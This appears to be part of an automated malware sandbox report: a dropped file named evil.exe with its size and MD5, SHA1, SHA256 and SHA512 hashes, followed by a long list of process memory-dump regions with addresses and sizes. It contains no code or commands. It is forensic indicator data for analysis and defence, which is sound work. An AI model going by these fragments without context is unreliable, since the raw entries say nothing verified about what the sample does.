                                                                                21eac0037b16f968ee8743b52dc73efdd34d24c2502d090b399a552dc6cb75f7d3090c10d448c66b868b1c4a7c46a5068b084b88b487e40b1e755356cb7557db

                                                                              • \Program Files (x86)\evil.exe

                                                                                Filesize

                                                                                23KB

                                                                                MD5

                                                                                0e0d73422110762ad112c39647865d09

                                                                                SHA1

                                                                                4bb94e94e65a8bc12313783df99b96d89d7fd764

                                                                                SHA256

                                                                                02ac6f6f2eff68b25be9ec044a2af027fbc915af3053f647086f68ad8d6c2e30

                                                                                SHA512

                                                                                e31a21c42c7bcdeb8dd80418fad12d5dc8486e21b609f5636114021fbcadb989ca7a612c0300ebb235c5f7a167a60541125409bd959442116407f48808742607

                                                                              • memory/328-2079-0x000007FEF6C70000-0x000007FEF6C92000-memory.dmp

                                                                                Filesize

                                                                                136KB

                                                                              • memory/380-229-0x000000001B2C0000-0x000000001B444000-memory.dmp

                                                                                Filesize

                                                                                1.5MB

                                                                              • memory/380-350-0x0000000000680000-0x000000000068C000-memory.dmp

                                                                                Filesize

                                                                                48KB

                                                                              • memory/380-277-0x00000000002A0000-0x00000000002BC000-memory.dmp

                                                                                Filesize

                                                                                112KB

                                                                              • memory/380-327-0x0000000000280000-0x000000000028E000-memory.dmp

                                                                                Filesize

                                                                                56KB

                                                                              • memory/380-339-0x0000000000290000-0x000000000029E000-memory.dmp

                                                                                Filesize

                                                                                56KB

                                                                              • memory/380-237-0x0000000000140000-0x0000000000146000-memory.dmp

                                                                                Filesize

                                                                                24KB

                                                                              • memory/380-165-0x0000000000190000-0x000000000026C000-memory.dmp

                                                                                Filesize

                                                                                880KB

                                                                              • memory/380-346-0x0000000000560000-0x000000000056E000-memory.dmp

                                                                                Filesize

                                                                                56KB

                                                                              • memory/380-183-0x0000000000130000-0x0000000000136000-memory.dmp

                                                                                Filesize

                                                                                24KB

                                                                              • memory/380-342-0x0000000000170000-0x000000000017C000-memory.dmp

                                                                                Filesize

                                                                                48KB

                                                                              • memory/380-323-0x0000000000660000-0x0000000000678000-memory.dmp

                                                                                Filesize

                                                                                96KB

                                                                              • memory/380-256-0x0000000000160000-0x000000000016E000-memory.dmp

                                                                                Filesize

                                                                                56KB

                                                                              • memory/492-1531-0x0000000000060000-0x0000000000061000-memory.dmp

                                                                                Filesize

                                                                                4KB

                                                                              • memory/536-1748-0x000007FEF6C70000-0x000007FEF6C92000-memory.dmp

                                                                                Filesize

                                                                                136KB

                                                                              • memory/536-1637-0x000007FEF6C70000-0x000007FEF6C92000-memory.dmp

                                                                                Filesize

                                                                                136KB

                                                                              • memory/840-164-0x00000000003A0000-0x00000000003C0000-memory.dmp

                                                                                Filesize

                                                                                128KB

                                                                              • memory/1064-166-0x00000000009D0000-0x0000000000BE4000-memory.dmp

                                                                                Filesize

                                                                                2.1MB

                                                                              • memory/1144-1618-0x000007FEF6C70000-0x000007FEF6C92000-memory.dmp

                                                                                Filesize

                                                                                136KB

                                                                              • memory/1432-119-0x0000000000400000-0x000000000048A000-memory.dmp

                                                                                Filesize

                                                                                552KB

                                                                              • memory/1432-2074-0x0000000000400000-0x000000000048A000-memory.dmp

                                                                                Filesize

                                                                                552KB

                                                                              • memory/1432-1425-0x0000000000400000-0x000000000048A000-memory.dmp

                                                                                Filesize

                                                                                552KB

                                                                              • memory/1432-1508-0x0000000000400000-0x000000000048A000-memory.dmp

                                                                                Filesize

                                                                                552KB

                                                                              • memory/1432-1591-0x0000000000400000-0x000000000048A000-memory.dmp

                                                                                Filesize

                                                                                552KB

                                                                              • memory/1432-274-0x0000000000400000-0x000000000048A000-memory.dmp

                                                                                Filesize

                                                                                552KB

                                                                              • memory/1432-1165-0x0000000000400000-0x000000000048A000-memory.dmp

                                                                                Filesize

                                                                                552KB

                                                                              • memory/1432-1730-0x0000000000400000-0x000000000048A000-memory.dmp

                                                                                Filesize

                                                                                552KB

                                                                              • memory/1564-214-0x0000000000400000-0x000000000046A000-memory.dmp

                                                                                Filesize

                                                                                424KB

                                                                              • memory/1960-12-0x0000000074710000-0x0000000074CBB000-memory.dmp

                                                                                Filesize

                                                                                5.7MB

                                                                              • memory/1960-13-0x0000000074710000-0x0000000074CBB000-memory.dmp

                                                                                Filesize

                                                                                5.7MB

                                                                              • memory/1960-141-0x0000000074710000-0x0000000074CBB000-memory.dmp

                                                                                Filesize

                                                                                5.7MB

                                                                              • memory/2032-116-0x00000000056A0000-0x000000000572A000-memory.dmp

                                                                                Filesize

                                                                                552KB

                                                                              • memory/2032-117-0x00000000056A0000-0x000000000572A000-memory.dmp

                                                                                Filesize

                                                                                552KB

                                                                              • memory/2032-136-0x0000000004550000-0x0000000004564000-memory.dmp

                                                                                Filesize

                                                                                80KB

                                                                              • memory/2032-140-0x0000000074710000-0x0000000074CBB000-memory.dmp

                                                                                Filesize

                                                                                5.7MB

                                                                              • memory/2032-0-0x0000000074711000-0x0000000074712000-memory.dmp

                                                                                Filesize

                                                                                4KB

                                                                              • memory/2032-198-0x0000000004550000-0x0000000004552000-memory.dmp

                                                                                Filesize

                                                                                8KB

                                                                              • memory/2032-830-0x0000000074710000-0x0000000074CBB000-memory.dmp

                                                                                Filesize

                                                                                5.7MB

                                                                              • memory/2032-1-0x0000000074710000-0x0000000074CBB000-memory.dmp

                                                                                Filesize

                                                                                5.7MB

                                                                              • memory/2032-2-0x0000000074710000-0x0000000074CBB000-memory.dmp

                                                                                Filesize

                                                                                5.7MB

                                                                              • memory/2032-238-0x00000000056A0000-0x000000000572A000-memory.dmp

                                                                                Filesize

                                                                                552KB

                                                                              • memory/2032-130-0x0000000074710000-0x0000000074CBB000-memory.dmp

                                                                                Filesize

                                                                                5.7MB

                                                                              • memory/2032-135-0x0000000004550000-0x0000000004564000-memory.dmp

                                                                                Filesize

                                                                                80KB

                                                                              • memory/2032-192-0x0000000004550000-0x0000000004552000-memory.dmp

                                                                                Filesize

                                                                                8KB

                                                                              • memory/2032-239-0x00000000056A0000-0x000000000572A000-memory.dmp

                                                                                Filesize

                                                                                552KB

                                                                              • memory/2068-1742-0x000007FEF6C70000-0x000007FEF6C92000-memory.dmp

                                                                                Filesize

                                                                                136KB

                                                                              • memory/2136-2070-0x0000000000400000-0x00000000004A2000-memory.dmp

                                                                                Filesize

                                                                                648KB

                                                                              • memory/2136-1577-0x0000000000400000-0x00000000004A2000-memory.dmp

                                                                                Filesize

                                                                                648KB

                                                                              • memory/2136-659-0x0000000000400000-0x00000000004A2000-memory.dmp

                                                                                Filesize

                                                                                648KB

                                                                              • memory/2136-1420-0x0000000000400000-0x00000000004A2000-memory.dmp

                                                                                Filesize

                                                                                648KB

                                                                              • memory/2136-671-0x0000000000400000-0x00000000004A2000-memory.dmp

                                                                                Filesize

                                                                                648KB

                                                                              • memory/2232-1741-0x000007FEF6C70000-0x000007FEF6C92000-memory.dmp

                                                                                Filesize

                                                                                136KB

                                                                              • memory/2312-1551-0x000007FEF6C70000-0x000007FEF6C92000-memory.dmp

                                                                                Filesize

                                                                                136KB

                                                                              • memory/2344-81-0x0000000000250000-0x000000000027A000-memory.dmp

                                                                                Filesize

                                                                                168KB

                                                                              • memory/2344-82-0x0000000000250000-0x000000000027A000-memory.dmp

                                                                                Filesize

                                                                                168KB

                                                                              • memory/2356-102-0x0000000000E70000-0x0000000000F46000-memory.dmp

                                                                                Filesize

                                                                                856KB

                                                                              • memory/2388-2353-0x0000000000400000-0x0000000000414000-memory.dmp

                                                                                Filesize

                                                                                80KB

                                                                              • memory/2388-143-0x0000000000020000-0x0000000000034000-memory.dmp

                                                                                Filesize

                                                                                80KB

                                                                              • memory/2388-142-0x0000000000400000-0x0000000000414000-memory.dmp

                                                                                Filesize

                                                                                80KB

                                                                              • memory/2452-85-0x00000000011C0000-0x00000000011F2000-memory.dmp

                                                                                Filesize

                                                                                200KB

                                                                              • memory/2480-392-0x0000000000CB0000-0x0000000000CC2000-memory.dmp

                                                                                Filesize

                                                                                72KB

                                                                              • memory/2480-398-0x0000000000C10000-0x0000000000C20000-memory.dmp

                                                                                Filesize

                                                                                64KB

                                                                              • memory/2480-104-0x0000000000FC0000-0x00000000012F2000-memory.dmp

                                                                                Filesize

                                                                                3.2MB

                                                                              • memory/2480-279-0x0000000000B90000-0x0000000000BB6000-memory.dmp

                                                                                Filesize

                                                                                152KB

                                                                              • memory/2480-362-0x0000000000520000-0x000000000052E000-memory.dmp

                                                                                Filesize

                                                                                56KB

                                                                              • memory/2480-385-0x0000000000C00000-0x0000000000C0E000-memory.dmp

                                                                                Filesize

                                                                                56KB

                                                                              • memory/2480-373-0x0000000000B80000-0x0000000000B90000-memory.dmp

                                                                                Filesize

                                                                                64KB

                                                                              • memory/2480-369-0x0000000000B70000-0x0000000000B80000-memory.dmp

                                                                                Filesize

                                                                                64KB

                                                                              • memory/2480-366-0x0000000000B60000-0x0000000000B70000-memory.dmp

                                                                                Filesize

                                                                                64KB

                                                                              • memory/2480-418-0x0000000000CF0000-0x0000000000D06000-memory.dmp

                                                                                Filesize

                                                                                88KB

                                                                              • memory/2480-444-0x0000000000D10000-0x0000000000D22000-memory.dmp

                                                                                Filesize

                                                                                72KB

                                                                              • memory/2480-490-0x0000000000CE0000-0x0000000000CF0000-memory.dmp

                                                                                Filesize

                                                                                64KB

                                                                              • memory/2480-488-0x0000000000CD0000-0x0000000000CE0000-memory.dmp

                                                                                Filesize

                                                                                64KB

                                                                              • memory/2480-464-0x0000000000C20000-0x0000000000C2E000-memory.dmp

                                                                                Filesize

                                                                                56KB

                                                                              • memory/2480-502-0x000000001B2D0000-0x000000001B32A000-memory.dmp

                                                                                Filesize

                                                                                360KB

                                                                              • memory/2480-511-0x0000000000E30000-0x0000000000E3E000-memory.dmp

                                                                                Filesize

                                                                                56KB

                                                                              • memory/2480-520-0x0000000000E40000-0x0000000000E50000-memory.dmp

                                                                                Filesize

                                                                                64KB

                                                                              • memory/2480-529-0x0000000000E80000-0x0000000000E98000-memory.dmp

                                                                                Filesize

                                                                                96KB

                                                                              • memory/2620-103-0x0000000000830000-0x0000000000906000-memory.dmp

                                                                                Filesize

                                                                                856KB

                                                                              • memory/2644-1628-0x000007FEF6C70000-0x000007FEF6C92000-memory.dmp

                                                                                Filesize

                                                                                136KB

                                                                              • memory/2644-1747-0x000007FEF6C70000-0x000007FEF6C92000-memory.dmp

                                                                                Filesize

                                                                                136KB

                                                                              • memory/2660-2481-0x0000000002060000-0x0000000002092000-memory.dmp

                                                                                Filesize

                                                                                200KB

                                                                              • memory/2660-2480-0x00000000072F0000-0x0000000007364000-memory.dmp

                                                                                Filesize

                                                                                464KB

                                                                              • memory/2660-364-0x00000000000D0000-0x000000000016A000-memory.dmp

                                                                                Filesize

                                                                                616KB

                                                                              • memory/2660-1537-0x00000000004D0000-0x00000000004E8000-memory.dmp

                                                                                Filesize

                                                                                96KB

                                                                              • memory/2664-500-0x000000013FCE0000-0x000000013FCEE000-memory.dmp

                                                                                Filesize

                                                                                56KB

                                                                              • memory/2888-1781-0x000007FEF6C70000-0x000007FEF6C92000-memory.dmp

                                                                                Filesize

                                                                                136KB

                                                                              • memory/2968-1638-0x000007FEF6C70000-0x000007FEF6C92000-memory.dmp

                                                                                Filesize

                                                                                136KB

                                                                              • memory/2980-1412-0x0000000000230000-0x0000000000232000-memory.dmp

                                                                                Filesize

                                                                                8KB

                                                                              • memory/2980-1417-0x0000000000400000-0x0000000000471000-memory.dmp

                                                                                Filesize

                                                                                452KB

                                                                              • memory/3032-1438-0x0000000000400000-0x0000000000428000-memory.dmp

                                                                                Filesize

                                                                                160KB

                                                                              • memory/3032-1418-0x0000000000400000-0x0000000000428000-memory.dmp

                                                                                Filesize

                                                                                160KB

                                                                              • memory/3032-2040-0x0000000000400000-0x0000000000428000-memory.dmp

                                                                                Filesize

                                                                                160KB

                                                                              • memory/3208-1546-0x000007FEF6C70000-0x000007FEF6C92000-memory.dmp

                                                                                Filesize

                                                                                136KB

                                                                              • memory/3208-1629-0x000007FEF6C70000-0x000007FEF6C92000-memory.dmp

                                                                                Filesize

                                                                                136KB

                                                                              • memory/3448-1779-0x00000000009B0000-0x0000000000A86000-memory.dmp

                                                                                Filesize

                                                                                856KB

                                                                              • memory/3632-2120-0x000000013F350000-0x000000013F35E000-memory.dmp

                                                                                Filesize

                                                                                56KB

                                                                              • memory/3664-1563-0x000007FEF6C70000-0x000007FEF6C92000-memory.dmp

                                                                                Filesize

                                                                                136KB

                                                                              • memory/3664-1527-0x000007FEF6C70000-0x000007FEF6C92000-memory.dmp

                                                                                Filesize

                                                                                136KB

                                                                              • memory/3680-2349-0x0000000000400000-0x0000000000412000-memory.dmp

                                                                                Filesize

                                                                                72KB

                                                                              • memory/3824-1416-0x0000000000400000-0x0000000000402000-memory.dmp

                                                                                Filesize

                                                                                8KB

                                                                              • memory/3872-1344-0x0000000000400000-0x0000000000420000-memory.dmp

                                                                                Filesize

                                                                                128KB

                                                                              • memory/3872-1338-0x0000000000400000-0x0000000000420000-memory.dmp

                                                                                Filesize

                                                                                128KB

                                                                              • memory/3872-1335-0x0000000000400000-0x0000000000420000-memory.dmp

                                                                                Filesize

                                                                                128KB

                                                                              • memory/3872-1331-0x0000000000400000-0x0000000000420000-memory.dmp

                                                                                Filesize

                                                                                128KB

                                                                              • memory/3872-1341-0x0000000000400000-0x0000000000420000-memory.dmp

                                                                                Filesize

                                                                                128KB

                                                                              • memory/3872-1333-0x0000000000400000-0x0000000000420000-memory.dmp

                                                                                Filesize

                                                                                128KB

                                                                              • memory/3872-1347-0x0000000000400000-0x0000000000420000-memory.dmp

                                                                                Filesize

                                                                                128KB

                                                                              • memory/3872-1348-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

                                                                                Filesize

                                                                                4KB

                                                                              • memory/3872-1350-0x0000000000400000-0x0000000000420000-memory.dmp

                                                                                Filesize

                                                                                128KB

                                                                              • memory/3916-2093-0x000007FEF6C70000-0x000007FEF6C92000-memory.dmp

                                                                                Filesize

                                                                                136KB

                                                                              • memory/4004-2023-0x0000000000CE0000-0x0000000000DB6000-memory.dmp

                                                                                Filesize

                                                                                856KB